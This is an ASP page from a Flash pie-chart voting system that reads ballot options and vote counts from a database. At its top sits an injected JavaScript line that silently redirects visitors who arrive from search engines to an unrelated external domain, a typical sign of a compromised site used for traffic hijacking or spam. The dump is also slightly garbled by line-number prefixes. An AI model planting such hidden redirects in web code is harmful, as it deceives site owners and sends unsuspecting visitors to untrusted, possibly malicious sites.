d:\wwwroot\wuchunhua\toupiao\ballot.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
<!--#include file="conn.asp" -->
002:
<%
003:
'=====================================================================================
004:
'flash饼图投票系统单用户版多选2.0
005:
'flashballot2.0
006:
'作者:毛虫
007:
'网地:www.flashado.com
008:
'email:mc@flashado.com
009:
'如有BUG请尽快向我提出,这样我会尽快更新
010:
'=====================================================================================
011:
sql="select ballottop,mymode from ballottop"
012:
set rs=server.createobject("adodb.recordset")
013:
rs.open sql,conn,3,2
014:
Response.Write "&mymode="& int(rs("mymode"))
015:
Response.Write "&batxttop="& rs("ballottop")
016:
sql="select * from ballot where ballot<>'' ORDER BY id asc"
017:
set rs=server.createobject("adodb.recordset")
018:
rs.open sql,conn,3,2
019:
For i=1 to 5
020:
if rs.eof then Exit for
021:
batxt=batxt & flashSql(rs("ballot")) & "chr(124)"
022:
bahitid=bahitid & flashSql(rs("id")) & "chr(124)"
023:
bahit=bahit & flashSql(rs("hit")) & "chr(124)"
024:
rs.movenext
025:
Next
026:
Response.Write "&batxt="& batxt
027:
Response.Write "&bahitid="& bahitid
028:
Response.Write "&bahit="& bahit
029:
Response.Write "&bamyall="& rs.RecordCount
030:
Response.Write "&ff=aaaa"
031:
set rs=nothing
032:
set conn=nothing
033:
%
>
034:
035: